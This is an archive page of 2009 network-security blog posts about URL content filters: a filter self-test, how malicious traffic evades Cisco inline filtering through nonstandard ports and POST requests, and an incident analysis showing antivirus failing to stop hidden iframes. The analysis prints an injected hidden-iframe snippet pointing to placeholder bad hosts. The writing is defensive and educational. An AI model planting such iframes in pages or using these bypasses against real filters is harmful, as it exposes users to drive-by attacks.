Archive for June, 2009

Test your inline URL content filter

Posted in NSM on 29 June, 2009 by Alec Waters

Following on from this post, here’s an easy way to see what your content filter does and does not check. The steps are:

  1. Visit http://wirewatcher.net/urlfiltertest/testit.aspx
  2. Check your content filter logs to make sure there’s an impression.
  3. Click the “Submit me via GET” button. The page will refresh, albeit with the same content as it had originally.
  4. Check your content filter logs to make sure there’s an impression.
  5. Click the “Submit me via POST” button. The page will refresh, albeit with the same content as it had originally.
  6. Check your content filter logs to make sure there’s an impression. If there isn’t one, then your content filter isn’t being queried for POST requests.
  7. Visit http://wirewatcher.net:50000/urlfiltertest/testit.aspx
  8. Repeat steps 2 – 6 above. If you get no pages back at all, then it’s likely that there is some degree of egress filtering going on to prevent you from seeing the page (a good thing!). If there are no log impressions on the content filter, then your content filter isn’t being queried for HTTP on nonstandard ports.

If you want to, please posts your results as comments, together with:

  • The brand of content filter software
  • The type of intermediate device that is querying the content filter (router, firewall, proxy, etc.)


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Sidestepping inline URL content filters

Posted in NSM on 26 June, 2009 by Alec Waters

Picture the scene – you have a small office network with a single gateway device hooking you up to the Internet. The gateway device performs your basic firewall and NAT tasks, and also hooks into some kind of URL filter server like Websense or McAfee SmartFilter. The URL filter will categorise all websites that people ask for, and will permit or deny access to them according to some defined policy. The trigger for this categorisation is the border device – it must look out for HTTP requests passing through it and act on them like this:

  1. The border device sees an HTTP request passing through it, heading outbound from the office network.
  2. The border device allows the request to carry on to its destination.
  3. When the response arrives, the border device will hold onto it and not release it back to the requester.
  4. Whilst the request is heading off to its destination, the border device parses out the URL and passes it off to the URL filter server (Websense/McAfee/whatever).
  5. The URL filter server will categorise the requested URL, apply a policy to it, and send a yes-or-no response back to the border device.
  6. If the response is a ‘yes’, the border device releases the response held in step 3 and the user will see their webpage.
  7. If the response is a ‘no’, the border device throws away the held response and instead returns an HTTP redirect to the user which will take them to some kind of blockpage telling them why their request was denied.

Organisations usually use this technology for applying some kind of HR-sanctioned policy (no porn, no warez, etc.), but there’s a strong security angle to its use, too.

McAfee SmartFilter has the option to ‘block’ certain categories you choose. It can also ‘warn’ instead of block – the difference is that the user can bypass a warn page, whereas a blockpage is a total dead end. Consider a security-only policy that looks like this and is designed to defend against common web threats like injected hidden iframes etc:

  • The policy will ‘block’ on anything that is categorised as being in any way malicious. Hopefully, if the URL filter vendor is doing their job properly, commonly injected URLs will fall into this category pretty quickly.
  • The policy will ‘warn’ on anything that is uncategorised. New websites turn up every nanosecond, so clearly the URL filter vendors are always playing catchup. In the case of something like conficker, frequent new URLs are part of its C&C strategy, so we have to exercise caution when allowing users to see uncategorised websites.

Why is this an effective strategy? Well, if an injected hidden iframe is categorised as Malicious, the hidden iframe will contain our URL filter’s blockpage instead of the malicious content and the user is saved. Likewise, if the iframe’s content is uncategorised, it will contain the warn page instead of the mischief – again, the user is saved.

Warning on uncategorised as opposed to outright blocking has the happy side effect that the user can proceed to view uncategorised sites that they have explicitly asked for. There’s no way a user can bypass a warn page that’s in a hidden iframe!

Clearly, this strategy isn’t 100% effective – it’s a preventative measure, after all, and prevention eventually fails. You’re primarily at the mercy of the URL filter vendor’s accuracy and timeliness of their categorisations, which can of course let you down. Having said that, from personal experience this is an extremely effective technique of keeping out the majority of today’s web-based attacks on desktop machines.

At this point, let’s think back to step four above:

“Whilst the request is heading off to its destination, the border device parses out the URL and passes it off to the URL filter server”

The key phrase here is “parses out the URL” – the border device actually needs to inspect the traffic passing through it and decide that something is or is not an HTTP request. Clearly, each vendor will have their own ways of doing this, and I can only really speak for Cisco kit here because that’s where my experience lies.

I’ve been finding that certain classes of web-based attacks seem to take measures that sidestep URL content filtering that may otherwise prevent delivery of the attack code to the browser. Whether they do this sidestepping deliberately isn’t something that I can tell you, but it does happen even if it’s just by accident.

The first sidestepping technique is to use a nonstandard port. There have been lots of .cn-targetted iframes injected recently, and their latest trick is to use port 8080 instead of 80. Why is this effective? It’s effective because (for Cisco at least) in order to parse out a URL the border device must recognise the traffic as HTTP, a step typically taken by looking at destination port numbers. A Cisco will, by default, only inspect traffic on port 80, so our iframes targetted at 8080 will not be vetted by the URL filter at all and will get delivered to the user’s browser:

router#show ip port-map http
Default mapping:  http   tcp port 80   system defined

Ooops. To fix this, you can either:

  • Apply some kind of egress filtering so that users can only see a subset of destination ports, or
  • Explicitly tell your Cisco to inspect more ports for HTTP:
router#show ip port-map http
Default mapping:  http   tcp port 80     system defined
Default mapping:  http   tcp port 8080   user defined
Default mapping:  http   tcp port 8000   user defined
Default mapping:  http   tcp port 8001   user defined
Default mapping:  http   tcp port 8801   user defined

Clearly the problem here is that there are over 65000 ports for the baddies to choose from…

The second sidestepping technique is to modify the HTTP verb that is used to fetch the mischief. For example, Waledac will use HTTP POSTs instead of GETs when communicating with its C&C servers. Waledac’s authors probably chose this verb due to the amount of data they want to upload, but it has an unpleasant side effect. Sadly, a Cisco will only pass GET URLs to the URL filter server – POSTs are ignored and are passed through, just like traffic on a non-http port. I don’t think it would take much for some injected javascript on a legitimate page to output a form, POST it to a malicious server and put the response into a hidden iframe…

I have no idea if other inline URL filter devices are susceptible to the same sidesteps, but Cisco ones definitely are. Whether they intended to or not, the bad guys are bypassing yet another layer of preventative defensive measures – it’s yet another thing for us all to look out for!

Comments welcome.

There is an update to this post here.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Listening for the Grasshopper

Posted in Case Studies, NSM on 25 June, 2009 by Alec Waters

Here’s a case study I originally wrote for SecurityMonkey’s blog, tidied up a bit, and with a somewhat less monkey-related theme:

Listening for the Grasshopper

Hope you find it interesting. Comments welcome!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Prevention Eventually Fails, part one

Posted in NSM on 19 June, 2009 by Alec Waters

Here’s a quick example of preventative measures (in this case anti-virus) failing, and how NSM can help us out.

The scenario:

An AV alert is raised saying that a nasty threat has been detected and removed from a machine. The staff responsible for the organisation’s servers and workstations rejoice – another success for their fine security measures!

Meanwhile, the network security staff see the alert also, and decide to do some digging of their own. The AV alert says something along the lines of:

“Hello, I have deleted an instance of J­S/Tenia.d on a machine at 10.6.7.130  from C:\Documents and Settings\some.user\Loc­al Settings\Temporary Internet Files\Content.IE5\some.directory\somefile[1].htm at 1/22/09 10:48:03 AM”

OK, so AV has removed a file from IE’s cache. Let’s research the threat a little – it says that it’s a detection of <iframe> tags after the document’s closing </html> tag. Minimally, this is malformed HTML – at worst, it’s some hostile code targetting the user’s browser.

But AV caught it, and we’re safe…

…right?

The NSM methodology advocates the validation of all reported security events, such as those fired by automated systems like AV and IDS. We can leap into action here and satisfy ourselves that AV did its job and that we are, indeed, in the clear.

The first task is to work out where the suspect  HTML came from in the first place. We know the name of the file from the AV report, and if we really wanted to we could parse the user’s IE history to find out where it came from.

But we don’t want to do something so grubby as interfering with someone’s machine. For one thing, our investigation will leave a forensic footprint on the machine that may hinder a subsequent examination. If we discover evidence of an actual crime, we don’t want our meddling with the machine to have inadvertently destroyed any evidence or introduced any artefacts that a defence barrister could use to discredit us. Let’s leave the machine alone and see what the network can tell us.

We know when the AV alert was raised, and we know the IP address of the infected machine. From this and from the full-content data we’ve been capturing, we can build a picture of the user’s browsing activity. If we locate the capture file that spans the time period we’re interested in, we can invoke a little tshark-fu:

tshark -r yourfile.pcap -R "http.request and ip.src eq 10.6.7.130"
-T fields -e frame.time -e http.host -e http.request.uri

This will give us a brief account of 10.6.7.130’s web browsing history, based upon what tshark can understand as an HTTP request (so we’re not going to see any HTTP on odd ports, for example, but it’s a good start!).

Alternatively, there may be other sources of information at our disposal. We may have proxy server logs, or URL filter logs, etc. However we do it, we will be able to determine the user’s browsing history without touching their machine.

Once we’ve got the history, we need to find somefile[1].htm. The “[1]” part is put there by IE when the file is cached, so we’re really after somefile.htm. We can look back through the user’s history and locate the full URL, based upon the time of the AV detection and the name of the file. This snippet came from the URL filter server scrutinising the user’s web browsing activity:

Jan 22 2009 10:42:47 10.6.7.130 Accessed URL

http://some.server/somefile.htm

This looks like it. There is a discrepancy in the timings, though. The timestamp above came from the carefully-synchronised device that performed the URL filtering. The timestamp in the AV report came from the suspect computer, whose clock is clearly a little out!

Now, to see if this file really is hostile (as AV claims), we can either fetch this URL in our carefully controlled lab environment, or we can extract it from the full-content capture.

Once we’ve recovered somefile.htm, we can see that there are indeed <iframe> tags after the closing </html> tag (hidden ones, too). Woohoo! AV did save us! The server and workstation team are laughing at us for expending all this effort to confirm what they already know! They’re on their way to the Bosses right now to explain how useless the NSM team is, and how all the NSM budget should be transferred to them! They’re planning the farewell party for when the imminently-redundant NSM team gets fired as a waste of resources!

Whilst all of this is going on, the NSM team continue the investigation by thinking about how a file moves from a web server to IE’s cache directory:

  • A file only gets into the IE cache directory once IE has downloaded it.
  • If IE has downloaded it, it means that IE has likely rendered it.
  • If it has rendered it, it means that any hostile code has already been executed.

Theory: deleting something from IE’s cache isn’t necessarily as good a thing as one might think. You may have been compromised by the hostile page, even though AV is claiming to have saved you.

How can we prove it, one way or the other?

We can carry on looking through the user’s network history that we’ve assembled already. We’ve carefully fetched the infected file, so we can see the URLs that were in the hidden <iframe>s. Did the user fetch these? If AV has been effective, we won’t see any trace of the <iframe>s being acted on.

Looking at our hostile file we see three hidden <iframe>s in it:

<iframe src="http://bad.server.one/count.php?o=2" width=0 height=0
style="hidden" frameborder=0 marginheight=0 marginwidth=0></iframe>
<iframe src="http://bad.server.two/count.php?o=2" width=0 height=0
style="hidden" frameborder=0 marginheight=0 marginwidth=0></iframe>
<iframe src="http://bad.server.three/count.php?o=2" width=0 height=0
style="hidden" frameborder=0 marginheight=0 marginwidth=0></iframe>

…and our URL history shows this:

Jan 22 2009 10:42:48 10.6.7.130 Access denied URL

http://bad.server.one/count.php?o=2

OK, a denied attempt on bad.server.one. It was blocked because the URL filter server (another preventative measure that was employed in this instance) decided that bad.server.one was malicious and that the user shouldn’t be allowed to fetch content from it. If we check the HTTP referrer for this request (either from the URL filter logs or by extracting it from our full-content capture) we can see that it was the file that AV was complaining about in the first place:

GET /count.php?o=2 HTTP/1.1
Host: bad.server.one
Referer: http://some.server/somefile.htm

This is proof that AV did not save us from anything at all. The threat was allowed to execute, and an attempt was made to download malicious content. The smug server/workstation team were not defended at all, and, even worse, were lulled into a false sense of security by the misleading AV report.

Time to cancel that farewell party, chaps.

There’s just one piece of the puzzle left to explain. Three <iframe>s were present, but only one was observed to be fetched by the browser. Why was this?

If we expand our analysis of the full-content capture we can see why. We can see DNS queries for bad.server.one, bad.server.two and bad.server.three, but only the query for bad.server.one actually comes back with an IP address – the other two come back as “no such name”. If there’s no DNS lookup, no TCP connection can be made to fetch the content for the second and third <iframe>s.

The moral of the story is that your AV solution might not be telling you the whole truth. Use NSM techniques to fully investigate the cirumstances surrounding the alert, and satisfy yourself that nothing bad is going on!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Follow

Get every new post delivered to your Inbox.

Join 29 other followers